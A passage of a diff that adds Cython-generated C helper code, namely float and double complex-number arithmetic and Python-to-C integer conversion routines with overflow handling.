z.imag*z.imag); + #else + return hypotf(z.real, z.imag); + #endif + } + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_pow_float(__pyx_t_float_complex a, __pyx_t_float_complex b) { + __pyx_t_float_complex z; + float r, lnr, theta, z_r, z_theta; + if (b.imag == 0 && b.real == (int)b.real) { + if (b.real < 0) { + float denom = a.real * a.real + a.imag * a.imag; + a.real = a.real / denom; + a.imag = -a.imag / denom; + b.real = -b.real; + } + switch ((int)b.real) { + case 0: + z.real = 1; + z.imag = 0; + return z; + case 1: + return a; + case 2: + return __Pyx_c_prod_float(a, a); + case 3: + z = __Pyx_c_prod_float(a, a); + return __Pyx_c_prod_float(z, a); + case 4: + z = __Pyx_c_prod_float(a, a); + return __Pyx_c_prod_float(z, z); + } + } + if (a.imag == 0) { + if (a.real == 0) { + return a; + } else if ((b.imag == 0) && (a.real >= 0)) { + z.real = powf(a.real, b.real); + z.imag = 0; + return z; + } else if (a.real > 0) { + r = a.real; + theta = 0; + } else { + r = -a.real; + theta = atan2f(0.0, -1.0); + } + } else { + r = __Pyx_c_abs_float(a); + theta = atan2f(a.imag, a.real); + } + lnr = logf(r); + z_r = expf(lnr * b.real - theta * b.imag); + z_theta = theta * b.real + lnr * b.imag; + z.real = z_r * cosf(z_theta); + z.imag = z_r * sinf(z_theta); + return z; + } + #endif +#endif + +/* Declarations */ + #if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) + #ifdef __cplusplus + static CYTHON_INLINE __pyx_t_double_complex __pyx_t_double_complex_from_parts(double x, double y) { + return ::std::complex< double >(x, y); + } + #else + static CYTHON_INLINE __pyx_t_double_complex __pyx_t_double_complex_from_parts(double x, double y) { + return x + y*(__pyx_t_double_complex)_Complex_I; + } + #endif +#else + static CYTHON_INLINE __pyx_t_double_complex __pyx_t_double_complex_from_parts(double x, double y) { + __pyx_t_double_complex z; + z.real = x; + z.imag = y; + return z; + } +#endif + +/* Arithmetic */ + #if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) +#else + static CYTHON_INLINE int __Pyx_c_eq_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { + return (a.real == b.real) && (a.imag == b.imag); + } + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_sum_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { + __pyx_t_double_complex z; + z.real = a.real + b.real; + z.imag = a.imag + b.imag; + return z; + } + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_diff_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { + __pyx_t_double_complex z; + z.real = a.real - b.real; + z.imag = a.imag - b.imag; + return z; + } + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_prod_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { + __pyx_t_double_complex z; + z.real = a.real * b.real - a.imag * b.imag; + z.imag = a.real * b.imag + a.imag * b.real; + return z; + } + #if 1 + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_quot_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { + if (b.imag == 0) { + return __pyx_t_double_complex_from_parts(a.real / b.real, a.imag / b.real); + } else if (fabs(b.real) >= fabs(b.imag)) { + if (b.real == 0 && b.imag == 0) { + return __pyx_t_double_complex_from_parts(a.real / b.real, a.imag / b.imag); + } else { + double r = b.imag / b.real; + double s = (double)(1.0) / (b.real + b.imag * r); + return __pyx_t_double_complex_from_parts( + (a.real + a.imag * r) * s, (a.imag - a.real * r) * s); + } + } else { + double r = b.real / b.imag; + double s = (double)(1.0) / (b.imag + b.real * r); + return __pyx_t_double_complex_from_parts( + (a.real * r + a.imag) * s, (a.imag * r - a.real) * s); + } + } + #else + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_quot_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { + if (b.imag == 0) { + return __pyx_t_double_complex_from_parts(a.real / b.real, a.imag / b.real); + } else { + double denom = b.real * b.real + b.imag * b.imag; + return __pyx_t_double_complex_from_parts( + (a.real * b.real + a.imag * b.imag) / denom, + (a.imag * b.real - a.real * b.imag) / denom); + } + } + #endif + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_neg_double(__pyx_t_double_complex a) { + __pyx_t_double_complex z; + z.real = -a.real; + z.imag = -a.imag; + return z; + } + static CYTHON_INLINE int __Pyx_c_is_zero_double(__pyx_t_double_complex a) { + return (a.real == 0) && (a.imag == 0); + } + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_conj_double(__pyx_t_double_complex a) { + __pyx_t_double_complex z; + z.real = a.real; + z.imag = -a.imag; + return z; + } + #if 1 + static CYTHON_INLINE double __Pyx_c_abs_double(__pyx_t_double_complex z) { + #if !defined(HAVE_HYPOT) || defined(_MSC_VER) + return sqrt(z.real*z.real + z.imag*z.imag); + #else + return hypot(z.real, z.imag); + #endif + } + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_pow_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { + __pyx_t_double_complex z; + double r, lnr, theta, z_r, z_theta; + if (b.imag == 0 && b.real == (int)b.real) { + if (b.real < 0) { + double denom = a.real * a.real + a.imag * a.imag; + a.real = a.real / denom; + a.imag = -a.imag / denom; + b.real = -b.real; + } + switch ((int)b.real) { + case 0: + z.real = 1; + z.imag = 0; + return z; + case 1: + return a; + case 2: + return __Pyx_c_prod_double(a, a); + case 3: + z = __Pyx_c_prod_double(a, a); + return __Pyx_c_prod_double(z, a); + case 4: + z = __Pyx_c_prod_double(a, a); + return __Pyx_c_prod_double(z, z); + } + } + if (a.imag == 0) { + if (a.real == 0) { + return a; + } else if ((b.imag == 0) && (a.real >= 0)) { + z.real = pow(a.real, b.real); + z.imag = 0; + return z; + } else if (a.real > 0) { + r = a.real; + theta = 0; + } else { + r = -a.real; + theta = atan2(0.0, -1.0); + } + } else { + r = __Pyx_c_abs_double(a); + theta = atan2(a.imag, a.real); + } + lnr = log(r); + z_r = exp(lnr * b.real - theta * b.imag); + z_theta = theta * b.real + lnr * b.imag; + z.real = z_r * cos(z_theta); + z.imag = z_r * sin(z_theta); + return z; + } + #endif +#endif + +/* CIntToPy */ + static CYTHON_INLINE PyObject* __Pyx_PyInt_From_long(long value) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const long neg_one = (long) -1, const_zero = (long) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; + if (is_unsigned) { + if (sizeof(long) < sizeof(long)) { + return PyInt_FromLong((long) value); + } else if (sizeof(long) <= sizeof(unsigned long)) { + return PyLong_FromUnsignedLong((unsigned long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(long) <= sizeof(unsigned PY_LONG_LONG)) { + return PyLong_FromUnsignedLongLong((unsigned PY_LONG_LONG) value); +#endif + } + } else { + if (sizeof(long) <= sizeof(long)) { + return PyInt_FromLong((long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(long) <= sizeof(PY_LONG_LONG)) { + return PyLong_FromLongLong((PY_LONG_LONG) value); +#endif + } + } + { + int one = 1; int little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&value; + return _PyLong_FromByteArray(bytes, sizeof(long), + little, !is_unsigned); + } +} + +/* FormatTypeName */ + #if CYTHON_COMPILING_IN_LIMITED_API +static __Pyx_TypeName +__Pyx_PyType_GetName(PyTypeObject* tp) +{ + PyObject *name = __Pyx_PyObject_GetAttrStr((PyObject *)tp, + __pyx_n_s_name); + if (unlikely(name == NULL) || unlikely(!PyUnicode_Check(name))) { + PyErr_Clear(); + Py_XSETREF(name, __Pyx_NewRef(__pyx_n_s__42)); + } + return name; +} +#endif + +/* CIntFromPyVerify */ + #define __PYX_VERIFY_RETURN_INT(target_type, func_type, func_value)\ + __PYX__VERIFY_RETURN_INT(target_type, func_type, func_value, 0) +#define __PYX_VERIFY_RETURN_INT_EXC(target_type, func_type, func_value)\ + __PYX__VERIFY_RETURN_INT(target_type, func_type, func_value, 1) +#define __PYX__VERIFY_RETURN_INT(target_type, func_type, func_value, exc)\ + {\ + func_type value = func_value;\ + if (sizeof(target_type) < sizeof(func_type)) {\ + if (unlikely(value != (func_type) (target_type) value)) {\ + func_type zero = 0;\ + if (exc && unlikely(value == (func_type)-1 && PyErr_Occurred()))\ + return (target_type) -1;\ + if (is_unsigned && unlikely(value < zero))\ + goto raise_neg_overflow;\ + else\ + goto raise_overflow;\ + }\ + }\ + return (target_type) value;\ + } + +/* CIntFromPy */ + static CYTHON_INLINE long __Pyx_PyInt_As_long(PyObject *x) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const long neg_one = (long) -1, const_zero = (long) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x))) { + if ((sizeof(long) < sizeof(long))) { + __PYX_VERIFY_RETURN_INT(long, long, PyInt_AS_LONG(x)) + } else { + long val = PyInt_AS_LONG(x); + if (is_unsigned && unlikely(val < 0)) { + goto raise_neg_overflow; + } + return (long) val; + } + } else +#endif + if (likely(PyLong_Check(x))) { + if (is_unsigned) { +#if CYTHON_USE_PYLONG_INTERNALS + if (unlikely(__Pyx_PyLong_IsNeg(x))) { + goto raise_neg_overflow; + } else if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(long, __Pyx_compact_upylong, __Pyx_PyLong_CompactValueUnsigned(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_DigitCount(x)) { + case 2: + if ((8 * sizeof(long) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) >= 2 * PyLong_SHIFT)) { + return (long) (((((long)digits[1]) << PyLong_SHIFT) | (long)digits[0])); + } + } + break; + case 3: + if ((8 * sizeof(long) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) >= 3 * PyLong_SHIFT)) { + return (long) (((((((long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0])); + } + } + break; + case 4: + if ((8 * sizeof(long) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) >= 4 * PyLong_SHIFT)) { + return (long) (((((((((long)digits[3]) << PyLong_SHIFT) | (long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0])); + } + } + break; + } + } +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A7 + if (unlikely(Py_SIZE(x) < 0)) { + goto raise_neg_overflow; + } +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (long) -1; + if (unlikely(result == 1)) + goto raise_neg_overflow; + } +#endif + if ((sizeof(long) <= sizeof(unsigned long))) { + __PYX_VERIFY_RETURN_INT_EXC(long, unsigned long, PyLong_AsUnsignedLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(long) <= sizeof(unsigned PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(long, unsigned PY_LONG_LONG, PyLong_AsUnsignedLongLong(x)) +#endif + } + } else { +#if CYTHON_USE_PYLONG_INTERNALS + if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(long, __Pyx_compact_pylong, __Pyx_PyLong_CompactValue(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_SignedDigitCount(x)) { + case -2: + if ((8 * sizeof(long) - 1 > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, long, -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 2 * PyLong_SHIFT)) { + return (long) (((long)-1)*(((((long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case 2: + if ((8 * sizeof(long) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 2 * PyLong_SHIFT)) { + return (long) ((((((long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case -3: + if ((8 * sizeof(long) - 1 > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, long, -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 3 * PyLong_SHIFT)) { + return (long) (((long)-1)*(((((((long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case 3: + if ((8 * sizeof(long) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 3 * PyLong_SHIFT)) { + return (long) ((((((((long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case -4: + if ((8 * sizeof(long) - 1 > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, long, -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 4 * PyLong_SHIFT)) { + return (long) (((long)-1)*(((((((((long)digits[3]) << PyLong_SHIFT) | (long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case 4: + if ((8 * sizeof(long) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 4 * PyLong_SHIFT)) { + return (long) ((((((((((long)digits[3]) << PyLong_SHIFT) | (long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + } + } +#endif + if ((sizeof(long) <= sizeof(long))) { + __PYX_VERIFY_RETURN_INT_EXC(long, long, PyLong_AsLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(long) <= sizeof(PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(long, PY_LONG_LONG, PyLong_AsLongLong(x)) +#endif + } + } + { + long val; + PyObject *v = __Pyx_PyNumber_IntOrLong(x); +#if PY_MAJOR_VERSION < 3 + if (likely(v) && !PyLong_Check(v)) { + PyObject *tmp = v; + v = PyNumber_Long(tmp); + Py_DECREF(tmp); + } +#endif + if (likely(v)) { + int ret = -1; +#if !(CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API) || defined(_PyLong_AsByteArray) + int one = 1; int is_little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&val; + ret = _PyLong_AsByteArray((PyLongObject *)v, + bytes, sizeof(val), + is_little, !is_unsigned); +#else + PyObject *stepval = NULL, *mask = NULL, *shift = NULL; + int bits, remaining_bits, is_negative = 0; + long idigit; + int chunk_size = (sizeof(long) < 8) ? 30 : 62; + if (unlikely(!PyLong_CheckExact(v))) { + PyObject *tmp = v; + v = PyNumber_Long(v); + assert(PyLong_CheckExact(v)); + Py_DECREF(tmp); + if (unlikely(!v)) return (long) -1; + } +#if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(x) == 0) + return (long) 0; + is_negative = Py_SIZE(x) < 0; +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (long) -1; + is_negative = result == 1; + } +#endif + if (is_unsigned && unlikely(is_negative)) { + goto raise_neg_overflow; + } else if (is_negative) { + stepval = PyNumber_Invert(v); + if (unlikely(!stepval)) + return (long) -1; + } else { + stepval = __Pyx_NewRef(v); + } + val = (long) 0; + mask = PyLong_FromLong((1L << chunk_size) - 1); if (unlikely(!mask)) goto done; + shift = PyLong_FromLong(chunk_size); if (unlikely(!shift)) goto done; + for (bits = 0; bits < (int) sizeof(long) * 8 - chunk_size; bits += chunk_size) { + PyObject *tmp, *digit; + digit = PyNumber_And(stepval, mask); + if (unlikely(!digit)) goto done; + idigit = PyLong_AsLong(digit); + Py_DECREF(digit); + if (unlikely(idigit < 0)) goto done; + tmp = PyNumber_Rshift(stepval, shift); + if (unlikely(!tmp)) goto done; + Py_DECREF(stepval); stepval = tmp; + val |= ((long) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(stepval) == 0) + goto unpacking_done; + #endif + } + idigit = PyLong_AsLong(stepval); + if (unlikely(idigit < 0)) goto done; + remaining_bits = ((int) sizeof(long) * 8) - bits - (is_unsigned ? 0 : 1); + if (unlikely(idigit >= (1L << remaining_bits))) + goto raise_overflow; + val |= ((long) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + unpacking_done: + #endif + if (!is_unsigned) { + if (unlikely(val & (((long) 1) << (sizeof(long) * 8 - 1)))) + goto raise_overflow; + if (is_negative) + val = ~val; + } + ret = 0; + done: + Py_XDECREF(shift); + Py_XDECREF(mask); + Py_XDECREF(stepval); +#endif + Py_DECREF(v); + if (likely(!ret)) + return val; + } + return (long) -1; + } + } else { + long val; + PyObject *tmp = __Pyx_PyNumber_IntOrLong(x); + if (!tmp) return (long) -1; + val = __Pyx_PyInt_As_long(tmp); + Py_DECREF(tmp); + return val; + } +raise_overflow: + PyErr_SetString(PyExc_OverflowError, + "value too large to convert to long"); + return (long) -1; +raise_neg_overflow: + PyErr_SetString(PyExc_OverflowError, + "can't convert negative value to long"); + return (long) -1; +} + +/* CIntFromPy */ + static CYTHON_INLINE int __Pyx_PyInt_As_int(PyObject *x) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const int neg_one = (int) -1, const_zero = (int) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x))) { + if ((sizeof(int) < sizeof(long))) { + __PYX_VERIFY_RETURN_INT(int, long, PyInt_AS_LONG(x)) + } else { + long val = PyInt_AS_LONG(x); + if (is_unsigned && unlikely(val < 0)) { + goto raise_neg_overflow; + } + return (int) val; + } + } else +#endif + if (likely(PyLong_Check(x))) { + if (is_unsigned) { +#if CYTHON_USE_PYLONG_INTERNALS + if (unlikely(__Pyx_PyLong_IsNeg(x))) { + goto raise_neg_overflow; + } else if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(int, __Pyx_compact_upylong, __Pyx_PyLong_CompactValueUnsigned(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_DigitCount(x)) { + case 2: + if ((8 * sizeof(int) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) >= 2 * PyLong_SHIFT)) { + return (int) (((((int)digits[1]) << PyLong_SHIFT) | (int)digits[0])); + } + } + break; + case 3: + if ((8 * sizeof(int) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) >= 3 * PyLong_SHIFT)) { + return (int) (((((((int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0])); + } + } + break; + case 4: + if ((8 * sizeof(int) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) >= 4 * PyLong_SHIFT)) { + return (int) (((((((((int)digits[3]) << PyLong_SHIFT) | (int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0])); + } + } + break; + } + } +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A7 + if (unlikely(Py_SIZE(x) < 0)) { + goto raise_neg_overflow; + } +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (int) -1; + if (unlikely(result == 1)) + goto raise_neg_overflow; + } +#endif + if ((sizeof(int) <= sizeof(unsigned long))) { + __PYX_VERIFY_RETURN_INT_EXC(int, unsigned long, PyLong_AsUnsignedLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(int) <= sizeof(unsigned PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(int, unsigned PY_LONG_LONG, PyLong_AsUnsignedLongLong(x)) +#endif + } + } else { +#if CYTHON_USE_PYLONG_INTERNALS + if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(int, __Pyx_compact_pylong, __Pyx_PyLong_CompactValue(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_SignedDigitCount(x)) { + case -2: + if ((8 * sizeof(int) - 1 > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, long, -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 2 * PyLong_SHIFT)) { + return (int) (((int)-1)*(((((int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case 2: + if ((8 * sizeof(int) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 2 * PyLong_SHIFT)) { + return (int) ((((((int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case -3: + if ((8 * sizeof(int) - 1 > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, long, -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 3 * PyLong_SHIFT)) { + return (int) (((int)-1)*(((((((int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case 3: + if ((8 * sizeof(int) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 3 * PyLong_SHIFT)) { + return (int) ((((((((int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case -4: + if ((8 * sizeof(int) - 1 > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, long, -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 4 * PyLong_SHIFT)) { + return (int) (((int)-1)*(((((((((int)digits[3]) << PyLong_SHIFT) | (int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case 4: + if ((8 * sizeof(int) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 4 * PyLong_SHIFT)) { + return (int) ((((((((((int)digits[3]) << PyLong_SHIFT) | (int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + } + } +#endif + if ((sizeof(int) <= sizeof(long))) { + __PYX_VERIFY_RETURN_INT_EXC(int, long, PyLong_AsLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(int) <= sizeof(PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(int, PY_LONG_LONG, PyLong_AsLongLong(x)) +#endif + } + } + { + int val; + PyObject *v = __Pyx_PyNumber_IntOrLong(x); +#if PY_MAJOR_VERSION < 3 + if (likely(v) && !PyLong_Check(v)) { + PyObject *tmp = v; + v = PyNumber_Long(tmp); + Py_DECREF(tmp); + } +#endif + if (likely(v)) { + int ret = -1; +#if !(CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API) || defined(_PyLong_AsByteArray) + int one = 1; int is_little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&val; + ret = _PyLong_AsByteArray((PyLongObject *)v, + bytes, sizeof(val), + is_little, !is_unsigned); +#else + PyObject *stepval = NULL, *mask = NULL, *shift = NULL; + int bits, remaining_bits, is_negative = 0; + long idigit; + int chunk_size = (sizeof(long) < 8) ? 30 : 62; + if (unlikely(!PyLong_CheckExact(v))) { + PyObject *tmp = v; + v = PyNumber_Long(v); + assert(PyLong_CheckExact(v)); + Py_DECREF(tmp); + if (unlikely(!v)) return (int) -1; + } +#if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(x) == 0) + return (int) 0; + is_negative = Py_SIZE(x) < 0; +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (int) -1; + is_negative = result == 1; + } +#endif + if (is_unsigned && unlikely(is_negative)) { + goto raise_neg_overflow; + } else if (is_negative) { + stepval = PyNumber_Invert(v); + if (unlikely(!stepval)) + return (int) -1; + } else { + stepval = __Pyx_NewRef(v); + } + val = (int) 0; + mask = PyLong_FromLong((1L << chunk_size) - 1); if (unlikely(!mask)) goto done; + shift = PyLong_FromLong(chunk_size); if (unlikely(!shift)) goto done; + for (bits = 0; bits < (int) sizeof(int) * 8 - chunk_size; bits += chunk_size) { + PyObject *tmp, *digit; + digit = PyNumber_And(stepval, mask); + if (unlikely(!digit)) goto done; + idigit = PyLong_AsLong(digit); + Py_DECREF(digit); + if (unlikely(idigit < 0)) goto done; + tmp = PyNumber_Rshift(stepval, shift); + if (unlikely(!tmp)) goto done; + Py_DECREF(stepval); stepval = tmp; + val |= ((int) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && 